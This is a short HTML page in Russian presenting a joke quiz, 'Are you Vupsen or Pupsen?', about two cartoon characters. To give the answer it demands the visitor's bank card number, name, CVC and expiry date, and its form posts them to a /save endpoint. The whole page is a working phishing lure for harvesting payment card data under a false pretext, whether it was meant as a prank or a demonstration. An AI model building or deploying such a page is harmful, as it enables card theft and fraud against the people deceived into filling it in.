<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Вупсень или Пупсень</title>
</head>
<body>
<h1>Вупсень или Пупсень?</h1>
<p>Ты Вупсень или Пупсень? Чтобы точно узнать, введи номер банковской карты!</p>

<form method="post" action="/save">
    <label>Номер карты:</label>
    <input type="text" name="number" />
    <label>Имя:</label>
    <input type="text" name="name" />
    <label>CVC:</label>
    <input type="text" name="cvc" />
    <label>Сроки:</label>
    <input type="text" name="data" />
    <input type="submit" value="Узнать!">

</form>
</body>
</html>